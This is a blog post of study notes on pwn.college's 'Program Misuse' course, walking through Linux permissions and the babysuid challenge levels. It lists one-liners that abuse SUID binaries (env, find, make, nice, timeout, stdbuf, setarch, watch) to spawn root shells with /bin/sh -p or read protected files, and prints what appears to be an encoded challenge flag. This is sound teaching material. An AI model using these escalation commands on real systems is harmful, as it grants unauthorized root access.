<!DOCTYPE html>
<html lang="en-us" dir="ltr">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='I will record some knowledge that I didn&#39;t know'><title>PwnCollege_Note</title>

<link rel='canonical' href='https://J-shiro.github.io/p/pwncollege_note/'>

<link rel="stylesheet" href="/scss/style.min.1c22be9c0d3cdc66f3ddced3767b9ba8a88bd3b5fcc80a4abdc3399441a0776f.css"><meta property='og:title' content='PwnCollege_Note'>
<meta property='og:description' content='I will record some knowledge that I didn&#39;t know'>
<meta property='og:url' content='https://J-shiro.github.io/p/pwncollege_note/'>
<meta property='og:site_name' content='J-shiro&#39;s Blog'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:published_time' content='2022-10-29T00:00:00&#43;00:00'/><meta property='article:modified_time' content='2022-10-29T00:00:00&#43;00:00'/><meta property='og:image' content='https://J-shiro.github.io/p/pwncollege_note/pwncollege.png' />
<meta name="twitter:title" content="PwnCollege_Note">
<meta name="twitter:description" content="I will record some knowledge that I didn&#39;t know"><meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content='https://J-shiro.github.io/p/pwncollege_note/pwncollege.png' />
    <link rel="shortcut icon" href="https://j-shiro.github.io/img/somebody.png" />

    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/">
                
                    
                    
                    
                        
                        <img src="/img/avatar_hu42aab1a06b48994d4eab55119e198264_548369_300x0_resize_box_3.png" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
                    <span class="emoji">🍥</span>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/">J-shiro&#39;s Blog</a></h1>
            <h2 class="site-description">Welcome! I will record some of my own hobbies there.//欢迎来到我的博客！</h2>
        </div>
    </header><ol class="social-menu">
            
                <li>
                    <a 
                        href='https://github.com/CaiJimmy/hugo-theme-stack'
                        target="_blank"
                        title="GitHub"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-github" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5" />
</svg>



                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='https://twitter.com'
                        target="_blank"
                        title="Twitter"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-twitter" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M22 4.01c-1 .49 -1.98 .689 -3 .99c-1.121 -1.265 -2.783 -1.335 -4.38 -.737s-2.643 2.06 -2.62 3.737v1c-3.245 .083 -6.135 -1.395 -8 -4c0 0 -4.182 7.433 4 11c-1.872 1.247 -3.739 2.088 -6 2c3.308 1.803 6.913 2.423 10.034 1.517c3.58 -1.04 6.522 -3.723 7.651 -7.742a13.84 13.84 0 0 0 .497 -3.753c-.002 -.249 1.51 -2.772 1.818 -4.013z" />
</svg>



                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>About</span>
            </a>
        </li>
        
        

        <li >
            <a href='/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>Archives</span>
            </a>
        </li>
        
        

        <li >
            <a href='/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>Search</span>
            </a>
        </li>
        
        

        <li >
            <a href='/links/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>Links</span>
            </a>
        </li>
        

        <div class="menu-bottom-section">
                <li id="i18n-switch">  
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-language" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M4 5h7" />
  <path d="M9 3v2c0 4.418 -2.239 8 -5 8" />
  <path d="M5 9c-.003 2.144 2.952 3.908 6.7 4" />
  <path d="M12 20l4 -9l4 9" />
  <path d="M19.1 18h-6.2" />
</svg>



                    <select name="language" onchange="window.location.href = this.selectedOptions[0].value">
                        
                            <option value="https://J-shiro.github.io/" selected>English</option>
                        
                            <option value="https://J-shiro.github.io/zh-cn/" >中文</option>
                        
                    </select>
                </li>
            
            
            
                <li id="dark-mode-toggle">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                    <span>Dark Mode</span>
                </li>
            
        </div>
    </ol>
</aside>
<main class="main full-width">
    <article class="has-image main-article">
    <header class="article-header">
        <div class="article-image">
            <a href="/p/pwncollege_note/">
                <img src="/p/pwncollege_note/pwncollege_hu81903c89f724cd0b9fb6316b0c4cba8d_28255_800x0_resize_box_3.png"
                        srcset="/p/pwncollege_note/pwncollege_hu81903c89f724cd0b9fb6316b0c4cba8d_28255_800x0_resize_box_3.png 800w, /p/pwncollege_note/pwncollege_hu81903c89f724cd0b9fb6316b0c4cba8d_28255_1600x0_resize_box_3.png 1600w"
                        width="800" 
                        height="276" 
                        loading="lazy"
                        alt="Featured image of post PwnCollege_Note" />
                
            </a>
        </div>
    

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/pwn.college/" >
                Pwn.college
            </a>
        
            <a href="/categories/foreigncourse/" >
                ForeignCourse
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/p/pwncollege_note/">PwnCollege_Note</a>
        </h2>
    
        
        <h3 class="article-subtitle">
            I will record some knowledge that I didn&#39;t know
        </h3>
        
    </div>

    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">Oct 29, 2022</time>
            </div>
        

        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time class="article-time--reading">
                    7 minute read
                </time>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



                <time class="article-words">
                    3095 字
                </time>
            </div>
        
    </footer>
    

    
</div>
</header>

    <section class="article-content">
    
    
    <h1 id="program-misuse">Program Misuse</h1>
<p>&mdash;&mdash;&mdash;&ndash;<strong>ASU CSE 365</strong>: Introduction to Cybersecurity</p>
<h2 id="program-interactionlinux-command-line">Program Interaction:Linux Command Line</h2>
<p>①	<strong>Learning the command line</strong></p>
<ol>
<li><a class="link" href="https://overthewire.org/wargames/bandit/"  target="_blank" rel="noopener"
    >Bandit</a></li>
</ol>
<p><img src="/img/pwn_college/lesson/filesystem.png"
	
	
	
	loading="lazy"
	
	
></p>
<p>②	<strong>env:</strong> Environment variables are a set of Key/Value pairs pased into every process when is is launched.</p>
<p>③	<strong>files:</strong> there&rsquo;re many different types of files.</p>
<blockquote>
<p><code>-</code> is a <strong>regular file</strong></p>
<p><code>d</code> is a <strong>directory</strong></p>
<p><code>l</code> is a <strong>symbolic link</strong>(point to another file or directory)</p>
<p><code>p</code> is a <strong>named pipe</strong>(FIFO)</p>
<p><code>c</code> is a <strong>character device file</strong>(backed by a hardware device that receives and produces data stream)</p>
<p><code>b</code> is a <strong>block device file</strong>(backed by a hardware device that stores and loads blocks of data)</p>
<p><code>s</code> is a <strong>unix socket</strong>(essentially a local network connection encapsulated in a file)</p>
</blockquote>
<p>④	<strong>Symbolic/soft links</strong> created by <code>ln -s</code>(-s stands for symbolic), it likes a pointer</p>
<p>⑤	<strong>Hard links</strong>: it copys the original file. If the original file is deleted, the links won&rsquo;t be deleted, and all the hard links can update the same time.</p>
<p>⑥	<strong>pipes</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl"><span class="nb">echo</span> <span class="nb">echo</span> hi		<span class="c1">#echo hi</span>
</span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="nb">echo</span> hi <span class="p">|</span> bash	<span class="c1">#hi</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>⑦	<strong>Input and output redirection</strong></p>
<p><code>&lt;in_file</code>、<code>&gt;outfile</code>、<code>&gt;&gt;out_file</code>、<code>2&gt;error_file</code>、<code>2&gt;&gt;error_file</code></p>
<h2 id="program-misuseprivilege-escalation">Program Misuse:Privilege Escalation</h2>
<p>①	<strong>permission model</strong></p>
<p>Permissions: <strong>r: 4	w: 2	x: 1</strong></p>
<p>File: first <code>rwx</code>: <strong>owner user</strong>	second <code>rwx</code>: <strong>owner group</strong>	third <code>rwx</code>: <strong>other groups</strong></p>
<p>default <strong>UID: 1000</strong>, <strong>UID 0</strong> is the Linux administrator user root</p>
<p>②	<strong>Privilege elevation</strong></p>
<p>run an suid binary such as <code>sudo</code>, <code>su</code>, <code>newgrp</code>(SUID is a bit in the Linux permission model)</p>
<p><strong>SUID</strong>: execute with the <code>eUID</code> of the file owner rather than the parent process.</p>
<p><strong>SGID</strong>: execute with the <code>eGID</code> of the file owner rather than the parent process.</p>
<p><strong>Sticky</strong>: used for shared directories to limit file removal to file owners.</p>
<p>three different type of user and group IDs</p>
<ul>
<li><strong>Effective(eUID,eGID):</strong> used for most access checks&ndash;&gt;root:0</li>
<li><strong>Real(UID,GID):</strong> true identity of the process owner, used for signal checks</li>
<li><strong>Saved:</strong> used for temporarily dropping privileges</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">gcc -w:Does not generate any warning information.
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">sudo chmod u+s xxx	<span class="c1">#SetUID bit, other users can have the file owner permissions</span>
</span></span><span class="line"><span class="cl"><span class="c1">#user:rwx---&gt;rws</span>
</span></span><span class="line"><span class="cl">sudo chown root.root xxx <span class="c1">#it will cancel the &#39;s&#39; user:rws---&gt;rwx</span>
</span></span><span class="line"><span class="cl">sudo chmod g+s xxx 	<span class="c1">#group:rwx---&gt;rws</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="program-misusemitigations">Program Misuse:Mitigations</h2>
<h2 id="babysuid-challenge">babysuid challenge</h2>
<p><strong>init:</strong> we can use the Desktop or the Workspace(then change to the terminal) to operate.</p>
<p><strong>suid:</strong> Suid special permissions only apply to executable files, the function is that as long as the user has execute permissions on the file with Suid, then <strong>when the user executes the file, the file will be executed as the  file owner</strong>, once the file is executed, the identity switch disappears.</p>
<p>level 1-6: there&rsquo;re some simple programs that can directly read the flag：<strong>cat, more, less, tail, head, sort</strong></p>
<p>level 7-9: there&rsquo;re some tools  &mdash;-&gt; over-privileged <strong>editors</strong>：<strong>vim, emacs, nano</strong></p>
<blockquote>
<p>emacs points to emacs-gtk by default, it will try to open if there&rsquo;s a graphical interface. But gtk can&rsquo;t setuid, so we can use the <code>-nw</code> to forces the graphics window not to pop up.</p>
</blockquote>
<p><img src="/img/pwn_college/level8/image-20221030103804124.png"
	
	
	
	loading="lazy"
	
	
></p>
<p><strong>output</strong></p>
<p>level 10：<strong>rev</strong>&mdash;&gt; Used to output each line of a file in reverse order of characters, that is, the first character is last and the last character is first.</p>
<p>level 11: <strong>od</strong>&mdash;&gt; Octal, decimal, hex, ASCII dump</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">-b:octal		-x -h:hex
</span></span><span class="line"><span class="cl">-c:ASCII		-d:Decimal<span class="o">(</span>ten<span class="o">)</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 12: <strong>hd</strong>&mdash;&gt; hexdump, mainly used to view the <strong>hexadecimal encoding</strong> of <strong>Binary files</strong>.</p>
<p>level 13: <strong>xxd</strong>&mdash;&gt; Convert any file to <strong>hexadecimal</strong> or binary(-b) form</p>
<p>level 14: <strong>base32</strong>&mdash;&gt; <code>echo 'some-base32-codings' | base32 -d</code> can decode the base32 coding</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&#39;ORUGS4ZANFZSA43PNVSSA5DFPB2CASJAO5QW45BAORXSAZLOMNXWIZIK&#39;
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 15: <strong>base64</strong>&mdash;&gt; decode form same as the base32</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&#39;cHduLmNvbGxlZ2V7NGxNTU1ILXJFUTdBZHZvNjVzNDEyV0p5Y1ZNLlFYM1VUTXNVRE40WXpXfQo=&#39;
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 16: <strong>split</strong>&mdash;&gt; split the file to the &lsquo;xaa&rsquo; file default(1000row to split).</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">split <span class="o">[</span>-b byte<span class="o">][</span>-C <span class="o">][</span>-<span class="o">][</span>-l rowcount<span class="o">][</span>the file to split<span class="o">][</span>the prefix of the output_file<span class="o">][</span>-a suffix_len<span class="o">]</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><strong>different archieve format</strong></p>
<p>If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor.</p>
<p>level 17: <strong>gzip</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">gzip -f file_name -t		<span class="o">(</span>-d decompress<span class="o">)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># -f:--force Forcibly compressed files		-t:--test Test whether the compressed file is correct.</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 18: <strong>bzip2</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">bzip2 -c file_name <span class="p">|</span> bzip2 -d
</span></span><span class="line"><span class="cl"><span class="c1">#-c:results are sent to standard output.</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-d:perform the decompression</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 19: <strong>zip</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">zip flag.zip flag <span class="c1">#flag --&gt; flag.zip</span>
</span></span><span class="line"><span class="cl">cat flag.zip <span class="c1">#you can see the flag</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 20: <strong>tar</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">tar -cf flag.tar.gz flag  	<span class="c1">#(-c:create new backup file -f:specify the backup file)</span>
</span></span><span class="line"><span class="cl">cat flag.tar.gz
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 21: <strong>ar</strong> &mdash;&gt; to create or modify a backup file</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">ar rv flag.back flag#-r:The file is inserted into the backup file	v:show the detail information
</span></span><span class="line"><span class="cl">cat flag.back
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 22: <strong>cpio</strong>&mdash;&gt;used to backup file</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">cpio -o	回车	<span class="c1">#-o Create the archive (run in copy-out mode)</span>
</span></span><span class="line"><span class="cl">flag
</span></span><span class="line"><span class="cl">ctrl + D得到flag
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 23: <strong>genisoimage</strong>&mdash;&gt; used to create an ISO 9660 image file, the output is placed inside the ISO9660 file system binary format.</p>
<p>the file is parsed, and some of its content is disclosed by the error messages, thus this might not be suitable to read arbitrary data.</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">genisoimage -sort flag
</span></span><span class="line"><span class="cl"><span class="c1">#-sort:to re-ordering the contents of the ISO</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><strong>execute other commands</strong></p>
<p>It can be used to break out from restricted environments by spawning an interactive system shell</p>
<p>level 24: <strong>env</strong>&mdash;&gt;show environment variables that already exists in the system and executes instructions in the defined environment</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">env /bin/sh -p <span class="c1">#getshell</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-p:/bin/sh either became bash or stayed dash which got an additional flag -p mimicking bash&#39;s behaviour, bash requires the -p flag to not drop setuid privilege.</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 25: <strong>find</strong>&mdash;&gt;used to find files in the specified directory</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">find . -exec /bin/sh -p <span class="se">\;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><code>exec command in Linux is used to execute a command from the bash itself. This command does not create a new process it just replaces the bash with the command to be executed. If the exec command is successful, it does not return to the calling process.</code></p>
<p>level 26: <strong>make</strong>&mdash;&gt; compile and install tools, manage project compilation issues</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">make -s --eval<span class="o">=</span><span class="s1">$&#39;x:\n\t-&#39;</span><span class="s2">&#34;/bin/sh -p&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-s:--silent don&#39;t echo recipes		--eval=STRING:evaluate STRING as a makefile statement</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 27: <strong>nice</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">nice /bin/sh -p
</span></span></code></pre></td></tr></table>
</div>
</div><blockquote>
<p><strong>Usage: nice [OPTION] [COMMAND [ARG]&hellip;]</strong>
Run COMMAND with an adjusted niceness, which affects process scheduling.With no COMMAND, print the current niceness.  Niceness values range from -20 (most favorable to the process) to 19 (least favorable to the process).</p>
</blockquote>
<p>level 28: <strong>timeout</strong>&mdash;&gt; start COMMAND, and kill it if still running after DURATION.</p>
<p><strong>Usage: timeout [OPTION] DURATION COMMAND [ARG]</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">timeout 7d /bin/sh -p
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 29: <strong>stdbuf</strong>&mdash;&gt; modify the buffer mode and size of the standard stream</p>
<blockquote>
<p><code>-i, --input=MODE</code>	adjust standard input stream buffering</p>
<p><code>-o, --output=MODE</code>	adjust standard output stream buffering</p>
<p><code>-e, --error=MODE</code>	adjust standard error stream buffering</p>
</blockquote>
<ul>
<li>
<p>If MODE is <code>L</code> the corresponding stream will be line buffered.This option is invalid with standard input.</p>
</li>
<li>
<p>If MODE is <code>0</code> the corresponding stream will be unbuffered.</p>
</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">stdbuf -i0 /bin/sh -p
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 30: <strong>setarch</strong>&mdash;&gt;change reported <strong>architecture</strong> in new program <strong>environment</strong> and set personality flags</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">setarch <span class="k">$(</span>arch<span class="k">)</span> /bin/sh -p <span class="c1">#arch can set to the i386</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>level 31: <strong>watch</strong>&mdash;&gt; listen by timing the output of other commands to a terminal, repeat the command every 2 seconds</p>
<p>Usage: <code>watch [options] command</code></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">watch -x sh -p -c <span class="s1">&#39;reset; exec sh -p 1&gt;&amp;0 2&gt;&amp;0&#39;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-x, --exec		pass command to exec instead of &#34;sh -c&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-c, --color	interpret ANSI color and style sequences</span>
</span></span></code></pre></td></tr></table>
</div>
